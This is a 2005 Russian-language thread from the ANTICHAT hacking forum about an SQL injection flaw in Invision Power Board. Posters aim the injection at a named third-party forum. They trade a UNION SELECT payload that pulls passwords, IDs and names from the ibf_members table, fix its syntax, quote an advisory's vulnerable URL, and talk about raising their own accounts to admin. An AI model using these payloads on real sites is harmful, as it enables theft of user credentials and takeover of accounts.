HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу SQL-инъекция в Invision Power Board
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

SQL-инъекция в Invision Power Board
  #1  
Старый 14.04.2005, 14:09
Юличка
Новичок
Регистрация: 13.06.2004
Сообщений: 9
С нами: 11530515

Репутация: 1
Exclamation SQL-инъекция в Invision Power Board
Сразу к делу вот просто форум

http://masichka.novoross.ru/forum/index.php

далее я сформироваю URL вот такой:

http://masichka.novoross.ru/forum/in...=SQL_INJECTION

вылетает окно и что дальше??
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 14.04.2005, 18:38
CunningFox
Познающий
Регистрация: 03.03.2005
Сообщений: 66
С нами: 11151399

Репутация: 0
По умолчанию
ошиба это..
 
Ответить с цитированием

  #3  
Старый 15.04.2005, 10:24
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
С нами: 11101353

Репутация: 0
По умолчанию
Ну и?
 
Ответить с цитированием

  #4  
Старый 15.04.2005, 11:16
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
С нами: 11101353

Репутация: 0
По умолчанию
%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0 ,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

С таким запросом не работает, а в чем ошибка?
 
Ответить с цитированием

  #5  
Старый 15.04.2005, 15:20
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
С нами: 12604706

Репутация: 0


По умолчанию
Цитата:
Сообщение от GaD  
%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0 ,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

С таким запросом не работает, а в чем ошибка?
Ну во первых
1,100%20UNION%20SELECT%200,0,password,id,name,0,0, 0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*
А во-вторых все равно работать не будет, поскольку ORDER BY несовместимо с UNION
 
Ответить с цитированием

  #6  
Старый 15.04.2005, 16:14
SEVKA
Новичок
Регистрация: 14.03.2005
Сообщений: 13
С нами: 11135711

Репутация: 0
По умолчанию
Вот читаю на секюрити лаб

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных уязвимого приложения.

Пример:

http://[target]/forums/index.php?act=Members
&max_results=30&filter=1&sort_order=asc&
sort_key=name&st=SQL_INJECTION

----------------------------------------------------------------------------------

И кто мне доступно обяснит как этим пользоваться ?
 
Ответить с цитированием

  #7  
Старый 15.04.2005, 17:10
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию
SQL_INJECTION

тут sql язык надо знать хорошо =\
типа создание таблиц перемещиние и т.д. с помощью этого можно свой аккаунт допустим сделать админским.
 
Ответить с цитированием

  #8  
Старый 16.04.2005, 11:46
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
С нами: 11101353

Репутация: 0
По умолчанию
круто... и правда работает и правда материться на использование Union и Order By, а вобще можно заюзать как нибудь этот баг?
 
Ответить с цитированием

  #9  
Старый 16.04.2005, 12:05
GaD
Новичок
Регистрация: 07.04.2005
Сообщений: 20
С нами: 11101353

Репутация: 0
По умолчанию
Ну ё мое
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.